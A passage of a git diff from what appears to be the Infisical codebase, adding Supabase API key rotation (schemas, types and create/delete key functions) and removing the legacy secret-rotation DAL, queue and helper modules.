TDbtServiceTokenRotation | TWindowsLocalAccountRotation | 
TOpenRouterApiKeyRotation - | THpIloRotation; + | THpIloRotation + | TSupabaseApiKeyRotation; export type TSecretRotationV2WithConnection = | TPostgresCredentialsRotationWithConnection @@ -160,7 +168,8 @@ export type TSecretRotationV2WithConnection = | TDbtServiceTokenRotationWithConnection | TWindowsLocalAccountRotationWithConnection | TOpenRouterApiKeyRotationWithConnection - | THpIloRotationWithConnection; + | THpIloRotationWithConnection + | TSupabaseApiKeyRotationWithConnection; export type TSecretRotationV2GeneratedCredentials = | TSqlCredentialsRotationGeneratedCredentials @@ -175,7 +184,8 @@ export type TSecretRotationV2GeneratedCredentials = | TDbtServiceTokenRotationGeneratedCredentials | TWindowsLocalAccountRotationGeneratedCredentials | TOpenRouterApiKeyRotationGeneratedCredentials - | THpIloRotationGeneratedCredentials; + | THpIloRotationGeneratedCredentials + | TSupabaseApiKeyRotationGeneratedCredentials; export type TSecretRotationV2Input = | TPostgresCredentialsRotationInput @@ -194,7 +204,8 @@ export type TSecretRotationV2Input = | TDbtServiceTokenRotationInput | TWindowsLocalAccountRotationInput | TOpenRouterApiKeyRotationInput - | THpIloRotationInput; + | THpIloRotationInput + | TSupabaseApiKeyRotationInput; export type TSecretRotationV2ListItem = | TPostgresCredentialsRotationListItem @@ -213,7 +224,8 @@ export type TSecretRotationV2ListItem = | TDbtServiceTokenRotationListItem | TWindowsLocalAccountRotationListItem | TOpenRouterApiKeyRotationListItem - | THpIloRotationListItem; + | THpIloRotationListItem + | TSupabaseApiKeyRotationListItem; export type TSecretRotationV2TemporaryParameters = | TLdapPasswordRotationInput["temporaryParameters"] @@ -272,6 +284,14 @@ export type TDeleteSecretRotationV2DTO = { revokeGeneratedCredentials: boolean; }; +export type TMoveSecretRotationV2DTO = { + type: SecretRotation; + rotationId: string; + destinationEnvironment: string; + destinationSecretPath: string; + overwriteDestination: boolean; +}; + /** 
Minimal rotation shape needed to build a permission subject (env, path, connectionId). */ export type TSecretRotationV2PermissionContext = { environment: { slug: string }; diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts index be478fde0c5..8b88b76faa4 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts @@ -18,6 +18,7 @@ import { WindowsLocalAccountRotationSchema } from "@app/ee/services/secret-rotat import { DbtServiceTokenRotationSchema } from "./dbt-service-token"; import { HpIloRotationSchema } from "./hp-ilo-rotation"; +import { SupabaseApiKeyRotationSchema } from "./supabase-api-key"; export const SecretRotationV2Schema = z.discriminatedUnion("type", [ PostgresCredentialsRotationSchema, @@ -36,5 +37,6 @@ export const SecretRotationV2Schema = z.discriminatedUnion("type", [ DbtServiceTokenRotationSchema, WindowsLocalAccountRotationSchema, OpenRouterApiKeyRotationSchema, - HpIloRotationSchema + HpIloRotationSchema, + SupabaseApiKeyRotationSchema ]); diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/index.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/index.ts new file mode 100644 index 00000000000..9e5d61a0555 --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/index.ts @@ -0,0 +1,3 @@ +export * from "./supabase-api-key-rotation-constants"; +export * from "./supabase-api-key-rotation-schemas"; +export * from "./supabase-api-key-rotation-types"; diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-constants.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-constants.ts new file mode 100644 index 00000000000..5d0604b03ad --- /dev/null +++ 
b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-constants.ts @@ -0,0 +1,14 @@ +import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums"; +import { TSecretRotationV2ListItem } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; + +export const SUPABASE_API_KEY_ROTATION_LIST_OPTION: TSecretRotationV2ListItem = { + name: "Supabase API Key", + type: SecretRotation.SupabaseApiKey, + connection: AppConnection.Supabase, + template: { + secretsMapping: { + apiKey: "SUPABASE_API_KEY" + } + } +}; diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-fns.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-fns.ts new file mode 100644 index 00000000000..2d898d3f866 --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-fns.ts @@ -0,0 +1,156 @@ +import { AxiosError } from "axios"; + +import { + TRotationFactory, + TRotationFactoryGetSecretsPayload, + TRotationFactoryIssueCredentials, + TRotationFactoryRevokeCredentials, + TRotationFactoryRotateCredentials +} from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types"; +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { + getSupabaseAuthHeaders, + getSupabaseInstanceUrl +} from "@app/services/app-connection/supabase/supabase-connection-public-client"; + +import { SupabaseApiKeyType } from "./supabase-api-key-rotation-schemas"; +import { + TSupabaseApiKeyCreateResponse, + TSupabaseApiKeyRotationGeneratedCredentials, + TSupabaseApiKeyRotationWithConnection +} from "./supabase-api-key-rotation-types"; + +const createErrorMessage = (error: unknown) => { + if (error instanceof AxiosError) { + const data = error.response?.data as { message?: string } | 
undefined; + if (data?.message) { + return data.message; + } + if (error.message) { + return error.message; + } + } + return (error as Error)?.message ?? "Unknown error"; +}; + +export const supabaseApiKeyRotationFactory: TRotationFactory< + TSupabaseApiKeyRotationWithConnection, + TSupabaseApiKeyRotationGeneratedCredentials +> = (secretRotation) => { + const { + connection, + parameters: { projectRef, keyType }, + secretsMapping + } = secretRotation; + + const connectionConfig = { + method: connection.method, + app: connection.app, + credentials: connection.credentials, + orgId: connection.orgId + }; + + const $createApiKey = async () => { + const baseUrl = await getSupabaseInstanceUrl(connectionConfig); + const headers = getSupabaseAuthHeaders(connectionConfig); + + try { + const { data } = await request.post( + `${baseUrl}/v1/projects/${encodeURIComponent(projectRef)}/api-keys`, + { + type: keyType === SupabaseApiKeyType.Publishable ? "publishable" : "secret", + name: `infisical_rotated_${keyType}_${Date.now()}`, + description: "Managed by Infisical secret rotation" + }, + { + headers: { + ...headers, + "Content-Type": "application/json" + }, + params: { reveal: true } + } + ); + + if (!data.api_key || !data.id) { + throw new Error("Invalid response from Supabase: missing 'api_key' or 'id'."); + } + + return { + apiKey: data.api_key, + keyId: data.id + }; + } catch (error: unknown) { + throw new BadRequestError({ + message: `Failed to create Supabase API key: ${createErrorMessage(error)}` + }); + } + }; + + const $deleteApiKey = async (keyId: string) => { + const baseUrl = await getSupabaseInstanceUrl(connectionConfig); + const headers = getSupabaseAuthHeaders(connectionConfig); + + try { + await request.delete( + `${baseUrl}/v1/projects/${encodeURIComponent(projectRef)}/api-keys/${encodeURIComponent(keyId)}`, + { + headers, + params: { reason: "Rotated by Infisical" } + } + ); + } catch (error: unknown) { + if (error instanceof AxiosError && 
error.response?.status === 404) { + return; + } + + throw new BadRequestError({ + message: `Failed to delete Supabase API key: ${createErrorMessage(error)}` + }); + } + }; + + const issueCredentials: TRotationFactoryIssueCredentials = async ( + callback + ) => { + const credentials = await $createApiKey(); + return callback(credentials); + }; + + const revokeCredentials: TRotationFactoryRevokeCredentials = async ( + credentials, + callback + ) => { + if (!credentials?.length) return callback(); + + await Promise.all(credentials.map(({ keyId }) => $deleteApiKey(keyId))); + + return callback(); + }; + + const rotateCredentials: TRotationFactoryRotateCredentials = async ( + oldCredentials, + callback + ) => { + const newCredentials = await $createApiKey(); + + const result = await callback(newCredentials); + + if (oldCredentials?.keyId) { + await $deleteApiKey(oldCredentials.keyId); + } + + return result; + }; + + const getSecretsPayload: TRotationFactoryGetSecretsPayload = ({ + apiKey + }) => [{ key: secretsMapping.apiKey, value: apiKey }]; + + return { + issueCredentials, + revokeCredentials, + rotateCredentials, + getSecretsPayload + }; +}; diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-schemas.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-schemas.ts new file mode 100644 index 00000000000..b3b262eeab8 --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-schemas.ts @@ -0,0 +1,67 @@ +import { z } from "zod"; + +import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums"; +import { + BaseCreateSecretRotationSchema, + BaseSecretRotationSchema, + BaseUpdateSecretRotationSchema +} from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-schemas"; +import { SecretRotations } from "@app/lib/api-docs"; +import { SecretNameSchema } from "@app/server/lib/schemas"; +import { AppConnection } 
from "@app/services/app-connection/app-connection-enums"; + +export const SupabaseApiKeyRotationGeneratedCredentialsSchema = z + .object({ + apiKey: z.string(), + keyId: z.string() + }) + .array() + .min(1) + .max(2); + +export enum SupabaseApiKeyType { + Publishable = "publishable", + Secret = "secret" +} + +const SupabaseApiKeyRotationParametersSchema = z.object({ + projectRef: z + .string() + .trim() + .min(1, "Project reference required") + .describe(SecretRotations.PARAMETERS.SUPABASE_API_KEY.projectRef), + keyType: z.nativeEnum(SupabaseApiKeyType).describe(SecretRotations.PARAMETERS.SUPABASE_API_KEY.keyType) +}); + +const SupabaseApiKeyRotationSecretsMappingSchema = z.object({ + apiKey: SecretNameSchema.describe(SecretRotations.SECRETS_MAPPING.SUPABASE_API_KEY.apiKey) +}); + +export const SupabaseApiKeyRotationTemplateSchema = z.object({ + secretsMapping: z.object({ + apiKey: z.string() + }) +}); + +export const SupabaseApiKeyRotationSchema = BaseSecretRotationSchema(SecretRotation.SupabaseApiKey).extend({ + type: z.literal(SecretRotation.SupabaseApiKey), + parameters: SupabaseApiKeyRotationParametersSchema, + secretsMapping: SupabaseApiKeyRotationSecretsMappingSchema +}); + +export const CreateSupabaseApiKeyRotationSchema = BaseCreateSecretRotationSchema(SecretRotation.SupabaseApiKey).extend({ + parameters: SupabaseApiKeyRotationParametersSchema, + secretsMapping: SupabaseApiKeyRotationSecretsMappingSchema +}); + +export const UpdateSupabaseApiKeyRotationSchema = BaseUpdateSecretRotationSchema(SecretRotation.SupabaseApiKey).extend({ + parameters: SupabaseApiKeyRotationParametersSchema.optional(), + secretsMapping: SupabaseApiKeyRotationSecretsMappingSchema.optional() +}); + +export const SupabaseApiKeyRotationListItemSchema = z.object({ + name: z.literal("Supabase API Key"), + connection: z.literal(AppConnection.Supabase), + type: z.literal(SecretRotation.SupabaseApiKey), + template: SupabaseApiKeyRotationTemplateSchema +}); diff --git 
a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-types.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-types.ts new file mode 100644 index 00000000000..374b2489eb0 --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-types.ts @@ -0,0 +1,37 @@ +import { z } from "zod"; + +import { TSupabaseConnection } from "@app/services/app-connection/supabase"; + +import { + CreateSupabaseApiKeyRotationSchema, + SupabaseApiKeyRotationGeneratedCredentialsSchema, + SupabaseApiKeyRotationListItemSchema, + SupabaseApiKeyRotationSchema +} from "./supabase-api-key-rotation-schemas"; + +export type TSupabaseApiKeyRotation = z.infer; + +export type TSupabaseApiKeyRotationInput = z.infer; + +export type TSupabaseApiKeyRotationListItem = z.infer; + +export type TSupabaseApiKeyRotationWithConnection = TSupabaseApiKeyRotation & { + connection: TSupabaseConnection; +}; + +export type TSupabaseApiKeyRotationGeneratedCredentials = z.infer< + typeof SupabaseApiKeyRotationGeneratedCredentialsSchema +>; + +export type TSupabaseApiKeyCreateResponse = { + api_key: string | null; + id: string | null; + type: "legacy" | "publishable" | "secret" | null; + prefix: string | null; + name: string; + description: string | null; + hash: string | null; + secret_jwt_template: Record | null; + inserted_at: string | null; + updated_at: string | null; +}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-dal.ts b/backend/src/ee/services/secret-rotation/secret-rotation-dal.ts deleted file mode 100644 index 7f885e4f935..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-dal.ts +++ /dev/null @@ -1,159 +0,0 @@ -import { Knex } from "knex"; - -import { TDbClient } from "@app/db"; -import { SecretRotationsSchema, TableName, TSecretRotations } from "@app/db/schemas"; -import { DatabaseError } from "@app/lib/errors"; -import { ormify, 
selectAllTableCols, sqlNestRelationships, TFindFilter } from "@app/lib/knex"; - -export type TSecretRotationDALFactory = ReturnType; - -export const secretRotationDALFactory = (db: TDbClient) => { - const secretRotationOrm = ormify(db, TableName.SecretRotation); - const secretRotationOutputOrm = ormify(db, TableName.SecretRotationOutput); - const secretRotationOutputV2Orm = ormify(db, TableName.SecretRotationOutputV2); - - const findQuery = (filter: TFindFilter, tx: Knex) => - tx(TableName.SecretRotation) - .where(filter) - .join(TableName.Environment, `${TableName.SecretRotation}.envId`, `${TableName.Environment}.id`) - .leftJoin( - TableName.SecretRotationOutput, - `${TableName.SecretRotation}.id`, - `${TableName.SecretRotationOutput}.rotationId` - ) - .join(TableName.Secret, `${TableName.SecretRotationOutput}.secretId`, `${TableName.Secret}.id`) - .select(selectAllTableCols(TableName.SecretRotation)) - .select(tx.ref("name").withSchema(TableName.Environment).as("envName")) - .select(tx.ref("slug").withSchema(TableName.Environment).as("envSlug")) - .select(tx.ref("id").withSchema(TableName.Environment).as("envId")) - .select(tx.ref("projectId").withSchema(TableName.Environment)) - .select(tx.ref("key").withSchema(TableName.SecretRotationOutput).as("outputKey")) - .select(tx.ref("id").withSchema(TableName.Secret).as("secId")) - .select(tx.ref("version").withSchema(TableName.Secret).as("secVersion")) - .select(tx.ref("secretKeyIV").withSchema(TableName.Secret)) - .select(tx.ref("secretKeyTag").withSchema(TableName.Secret)) - .select(tx.ref("secretKeyCiphertext").withSchema(TableName.Secret)); - - const find = async (filter: TFindFilter, tx?: Knex) => { - try { - const data = await findQuery(filter, tx || db.replicaNode()); - return sqlNestRelationships({ - data, - key: "id", - parentMapper: (el) => ({ - ...SecretRotationsSchema.parse(el), - projectId: el.projectId, - environment: { id: el.envId, name: el.envName, slug: el.envSlug } - }), - childrenMapper: [ - { - 
key: "secId", - label: "outputs" as const, - mapper: ({ secId, outputKey, secVersion, secretKeyIV, secretKeyTag, secretKeyCiphertext }) => ({ - key: outputKey, - secret: { - id: secId, - version: secVersion, - secretKeyIV, - secretKeyTag, - secretKeyCiphertext - } - }) - } - ] - }); - } catch (error) { - throw new DatabaseError({ error, name: "SecretRotationFind" }); - } - }; - - const findQuerySecretV2 = (filter: TFindFilter, tx: Knex) => - tx(TableName.SecretRotation) - .where(filter) - .join(TableName.Environment, `${TableName.SecretRotation}.envId`, `${TableName.Environment}.id`) - .leftJoin( - TableName.SecretRotationOutputV2, - `${TableName.SecretRotation}.id`, - `${TableName.SecretRotationOutputV2}.rotationId` - ) - .join(TableName.SecretV2, `${TableName.SecretRotationOutputV2}.secretId`, `${TableName.SecretV2}.id`) - .select(selectAllTableCols(TableName.SecretRotation)) - .select(tx.ref("name").withSchema(TableName.Environment).as("envName")) - .select(tx.ref("slug").withSchema(TableName.Environment).as("envSlug")) - .select(tx.ref("id").withSchema(TableName.Environment).as("envId")) - .select(tx.ref("projectId").withSchema(TableName.Environment)) - .select(tx.ref("key").withSchema(TableName.SecretRotationOutputV2).as("outputKey")) - .select(tx.ref("id").withSchema(TableName.SecretV2).as("secId")) - .select(tx.ref("version").withSchema(TableName.SecretV2).as("secVersion")) - .select(tx.ref("key").withSchema(TableName.SecretV2).as("secretKey")); - - const findSecretV2 = async (filter: TFindFilter, tx?: Knex) => { - try { - const data = await findQuerySecretV2(filter, tx || db.replicaNode()); - return sqlNestRelationships({ - data, - key: "id", - parentMapper: (el) => ({ - ...SecretRotationsSchema.parse(el), - projectId: el.projectId, - environment: { id: el.envId, name: el.envName, slug: el.envSlug } - }), - childrenMapper: [ - { - key: "secId", - label: "outputs" as const, - mapper: ({ secId, outputKey, secVersion, secretKey }) => ({ - key: outputKey, - 
secret: { - id: secId, - version: secVersion, - secretKey - } - }) - } - ] - }); - } catch (error) { - throw new DatabaseError({ error, name: "SecretRotationFind" }); - } - }; - - const findById = async (id: string, tx?: Knex) => { - try { - const doc = await (tx || db.replicaNode())(TableName.SecretRotation) - .join(TableName.Environment, `${TableName.SecretRotation}.envId`, `${TableName.Environment}.id`) - .where({ [`${TableName.SecretRotation}.id` as "id"]: id }) - .select(selectAllTableCols(TableName.SecretRotation)) - .select( - db.ref("id").withSchema(TableName.Environment).as("envId"), - db.ref("projectId").withSchema(TableName.Environment), - db.ref("slug").withSchema(TableName.Environment).as("envSlug"), - db.ref("name").withSchema(TableName.Environment).as("envName") - ) - .first(); - if (doc) { - const { envName, envSlug, envId, ...el } = doc; - return { ...el, envId, environment: { id: envId, slug: envSlug, name: envName } }; - } - } catch (error) { - throw new DatabaseError({ error, name: "SecretRotationFindById" }); - } - }; - - const findRotationOutputsByRotationId = async (rotationId: string) => secretRotationOutputOrm.find({ rotationId }); - const findRotationOutputsV2ByRotationId = async (rotationId: string) => - secretRotationOutputV2Orm.find({ rotationId }); - - // special query - - return { - ...secretRotationOrm, - find, - findSecretV2, - findById, - secretOutputInsertMany: secretRotationOutputOrm.insertMany, - secretOutputV2InsertMany: secretRotationOutputV2Orm.insertMany, - findRotationOutputsByRotationId, - findRotationOutputsV2ByRotationId - }; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-queue/index.ts b/backend/src/ee/services/secret-rotation/secret-rotation-queue/index.ts deleted file mode 100644 index 1d8c50b363f..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/index.ts +++ /dev/null @@ -1,2 +0,0 @@ -export type { TSecretRotationQueueFactory } from "./secret-rotation-queue"; 
-export { DisableRotationErrors, secretRotationQueueFactory } from "./secret-rotation-queue"; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-fn.ts b/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-fn.ts deleted file mode 100644 index 8cc7dac4ba8..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-fn.ts +++ /dev/null @@ -1,193 +0,0 @@ -/* eslint-disable @typescript-eslint/no-unsafe-argument */ -/* eslint-disable @typescript-eslint/no-unsafe-member-access */ -/* eslint-disable @typescript-eslint/no-unsafe-return */ -/* eslint-disable @typescript-eslint/no-unsafe-assignment */ -/* eslint-disable @typescript-eslint/no-explicit-any */ -/* eslint-disable no-param-reassign */ -import axios from "axios"; -import jmespath from "jmespath"; -import knex from "knex"; - -import { alphaNumericNanoId } from "@app/lib/nanoid"; - -import { verifyHostInputValidity } from "../../dynamic-secret/dynamic-secret-fns"; -import { TAssignOp, TDbProviderClients, TDirectAssignOp, THttpProviderFunction } from "../templates/types"; -import { TSecretRotationData, TSecretRotationDbFn } from "./secret-rotation-queue-types"; - -const EXTERNAL_REQUEST_TIMEOUT = 10 * 1000; - -const replaceTemplateVariables = (str: string, getValue: (key: string) => unknown) => { - // Use array to collect pieces and join at the end (more efficient for large strings) - const parts: string[] = []; - let pos = 0; - - while (pos < str.length) { - const start = str.indexOf("${", pos); - if (start === -1) { - parts.push(str.slice(pos)); - break; - } - - parts.push(str.slice(pos, start)); - const end = str.indexOf("}", start + 2); - - if (end === -1) { - parts.push(str.slice(start)); - break; - } - - const varName = str.slice(start + 2, end); - parts.push(String(getValue(varName))); - pos = end + 1; - } - - return parts.join(""); -}; - -export const interpolate = (data: any, getValue: (key: 
string) => unknown) => { - if (!data) return; - - if (typeof data === "number") return data; - - if (typeof data === "string") { - return replaceTemplateVariables(data, getValue); - } - - if (typeof data === "object" && Array.isArray(data)) { - data.forEach((el, index) => { - // eslint-disable-next-line - data[index] = interpolate(el, getValue); - }); - } - - if (typeof data === "object") { - if ((data as { ref: string })?.ref) return getValue((data as { ref: string }).ref); - const temp = data as Record; // for converting ts object to record type - Object.keys(temp).forEach((key) => { - temp[key] = interpolate(data[key], getValue); - }); - } - return data; -}; - -const getInterpolationValue = (variables: TSecretRotationData) => (key: string) => { - if (key.includes("|")) { - const [keyword, ...arg] = key.split("|").map((el) => el.trim()); - switch (keyword) { - case "random": { - return alphaNumericNanoId(parseInt(arg[0], 10)); - } - default: { - throw Error(`Interpolation key not found - ${key}`); - } - } - } - const [type, keyName] = key.split(".").map((el) => el.trim()); - return variables[type as keyof TSecretRotationData][keyName]; -}; - -export const secretRotationHttpFn = async (func: THttpProviderFunction, variables: TSecretRotationData) => { - // string interpolation - const headers = interpolate(func.header, getInterpolationValue(variables)); - const url = interpolate(func.url, getInterpolationValue(variables)); - const body = interpolate(func.body, getInterpolationValue(variables)); - // axios will automatically throw error if req status is not between 2xx range - return axios({ - method: func.method, - url, - headers, - data: body, - timeout: EXTERNAL_REQUEST_TIMEOUT, - signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT) - }); -}; - -export const secretRotationDbFn = async ({ - ca, - host, - port, - query, - database, - password, - username, - client, - variables, - options -}: TSecretRotationDbFn) => { - const ssl = ca ? 
{ rejectUnauthorized: false, ca } : undefined; - const [hostIp] = await verifyHostInputValidity({ host, isDynamicSecret: false }); - const db = knex({ - client, - connection: { - database, - port, - host: hostIp, - user: username, - password, - connectionTimeoutMillis: EXTERNAL_REQUEST_TIMEOUT, - ssl, - pool: { min: 0, max: 1 }, - options - } - }); - const data = await db.raw(query, variables); - return data; -}; - -export const secretRotationPreSetFn = (op: Record, variables: TSecretRotationData) => { - const getValFn = getInterpolationValue(variables); - Object.entries(op || {}).forEach(([key, assignFn]) => { - const [type, keyName] = key.split(".") as [keyof TSecretRotationData, string]; - variables[type][keyName] = interpolate(assignFn.value, getValFn); - }); -}; - -export const secretRotationHttpSetFn = async (func: THttpProviderFunction, variables: TSecretRotationData) => { - const getValFn = getInterpolationValue(variables); - // http setter - const res = await secretRotationHttpFn(func, variables); - Object.entries(func.setter || {}).forEach(([key, assignFn]) => { - const [type, keyName] = key.split(".") as [keyof TSecretRotationData, string]; - if (assignFn.assign === TAssignOp.JmesPath) { - variables[type][keyName] = jmespath.search(res.data, assignFn.path); - } else if (assignFn.value) { - variables[type][keyName] = interpolate(assignFn.value, getValFn); - } - }); -}; - -export const getDbSetQuery = (db: TDbProviderClients, variables: { username: string; password: string }) => { - if (db === TDbProviderClients.Pg) { - return { - query: `ALTER USER ?? WITH PASSWORD '${variables.password}'`, - variables: [variables.username] - }; - } - - if (db === TDbProviderClients.MsSqlServer) { - return { - query: `ALTER LOGIN ?? 
WITH PASSWORD = '${variables.password}'`, - variables: [variables.username] - }; - } - - if (db === TDbProviderClients.MySql) { - return { - query: `ALTER USER ??@'%' IDENTIFIED BY '${variables.password}'`, - variables: [variables.username] - }; - } - - if (db === TDbProviderClients.OracleDB) { - return { - query: `ALTER USER ?? IDENTIFIED BY "${variables.password}"`, - variables: [variables.username] - }; - } - - // add more based on client - return { - query: `ALTER USER ?? IDENTIFIED BY '${variables.password}'`, - variables: [variables.username] - }; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-types.ts b/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-types.ts deleted file mode 100644 index e0d4c18761b..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue-types.ts +++ /dev/null @@ -1,28 +0,0 @@ -import { TDbProviderClients } from "../templates/types"; - -export type TSecretRotationEncData = { - inputs: Record; - creds: Array<{ - outputs: Record; - internal: Record; - }>; -}; - -export type TSecretRotationData = { - inputs: Record; - outputs: Record; - internal: Record; -}; - -export type TSecretRotationDbFn = { - client: TDbProviderClients; - username: string; - password: string; - host: string; - database: string; - port: number; - query: string; - variables: unknown[]; - ca?: string; - options?: Record; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts b/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts deleted file mode 100644 index 0464d23d265..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts +++ /dev/null @@ -1,442 +0,0 @@ -import { - CreateAccessKeyCommand, - DeleteAccessKeyCommand, - GetAccessKeyLastUsedCommand, - IAMClient -} from "@aws-sdk/client-iam"; - -import { 
SecretType } from "@app/db/schemas"; -import { CustomAWSHasher } from "@app/lib/aws/hashing"; -import { getConfig } from "@app/lib/config/env"; -import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography"; -import { daysToMillisecond, secondsToMillis } from "@app/lib/dates"; -import { NotFoundError } from "@app/lib/errors"; -import { logger } from "@app/lib/logger"; -import { alphaNumericNanoId } from "@app/lib/nanoid"; -import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue"; -import { ActorType } from "@app/services/auth/auth-type"; -import { CommitType, TFolderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service"; -import { TKmsServiceFactory } from "@app/services/kms/kms-service"; -import { KmsDataKey } from "@app/services/kms/kms-types"; -import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service"; -import { TSecretDALFactory } from "@app/services/secret/secret-dal"; -import { TSecretVersionDALFactory } from "@app/services/secret/secret-version-dal"; -import { TSecretV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-dal"; -import { TSecretVersionV2DALFactory } from "@app/services/secret-v2-bridge/secret-version-dal"; -import { TTelemetryServiceFactory } from "@app/services/telemetry/telemetry-service"; -import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; - -import { TSecretRotationDALFactory } from "../secret-rotation-dal"; -import { rotationTemplates } from "../templates"; -import { - TAwsProviderSystems, - TDbProviderClients, - TProviderFunctionTypes, - TSecretRotationProviderTemplate -} from "../templates/types"; -import { - getDbSetQuery, - secretRotationDbFn, - secretRotationHttpFn, - secretRotationHttpSetFn, - secretRotationPreSetFn -} from "./secret-rotation-queue-fn"; -import { TSecretRotationData, TSecretRotationDbFn, TSecretRotationEncData } from "./secret-rotation-queue-types"; - -export type 
TSecretRotationQueueFactory = ReturnType; - -type TSecretRotationQueueFactoryDep = { - queue: TQueueServiceFactory; - secretRotationDAL: TSecretRotationDALFactory; - projectBotService: Pick; - secretDAL: Pick; - secretV2BridgeDAL: Pick; - secretVersionDAL: Pick; - secretVersionV2BridgeDAL: Pick; - telemetryService: Pick; - kmsService: Pick; - folderCommitService: Pick; -}; - -// These error should stop the repeatable job and ask user to reconfigure rotation -export class DisableRotationErrors extends Error { - name: string; - - error: unknown; - - constructor({ name, error, message }: { message: string; name?: string; error?: unknown }) { - super(message); - this.name = name || "DisableRotationErrors"; - this.error = error; - } -} - -export const secretRotationQueueFactory = ({ - queue, - secretRotationDAL, - projectBotService, - secretDAL, - secretVersionDAL, - telemetryService, - secretV2BridgeDAL, - secretVersionV2BridgeDAL, - folderCommitService, - kmsService -}: TSecretRotationQueueFactoryDep) => { - const addToQueue = async () => {}; - - const removeFromQueue = async (rotationId: string, interval: number) => { - const appCfg = getConfig(); - await queue.stopRepeatableJob( - QueueName.SecretRotation, - QueueJobs.SecretRotation, - { - // on prod it this will be in days, in development this will be second - every: appCfg.NODE_ENV === "development" ? 
secondsToMillis(interval) : daysToMillisecond(interval) - }, - rotationId - ); - }; - - queue.start(QueueName.SecretRotation, async (job) => { - const { rotationId } = job.data; - const appCfg = getConfig(); - - logger.info(`secretRotationQueue.process: [rotationDocument=${rotationId}]`); - const secretRotation = await secretRotationDAL.findById(rotationId); - const rotationProvider = rotationTemplates.find(({ name }) => name === secretRotation?.provider); - - try { - if (!rotationProvider || !secretRotation) throw new DisableRotationErrors({ message: "Provider not found" }); - - const { botKey, shouldUseSecretV2Bridge } = await projectBotService.getBotKey(secretRotation.projectId); - let rotationOutputs; - if (shouldUseSecretV2Bridge) { - rotationOutputs = await secretRotationDAL.findRotationOutputsV2ByRotationId(rotationId); - } else { - rotationOutputs = await secretRotationDAL.findRotationOutputsByRotationId(rotationId); - } - if (!rotationOutputs.length) throw new DisableRotationErrors({ message: "Secrets not found" }); - - // deep copy - const provider = JSON.parse(JSON.stringify(rotationProvider)) as TSecretRotationProviderTemplate; - const { encryptor: secretManagerEncryptor, decryptor: secretManagerDecryptor } = - await kmsService.createCipherPairWithDataKey({ - type: KmsDataKey.SecretManager, - projectId: secretRotation.projectId - }); - - const decryptedData = secretManagerDecryptor({ - cipherTextBlob: secretRotation.encryptedRotationData - }).toString(); - - const variables = JSON.parse(decryptedData) as TSecretRotationEncData; - // rotation set cycle - const newCredential: TSecretRotationData = { - inputs: variables.inputs, - outputs: {}, - internal: {} - }; - - /* Rotation Function For Database - * A database like sql cannot have multiple password for a user - * thus we ask users to create two users with required permission and then we keep cycling between these two db users - */ - if (provider.template.type === TProviderFunctionTypes.DB) { - const 
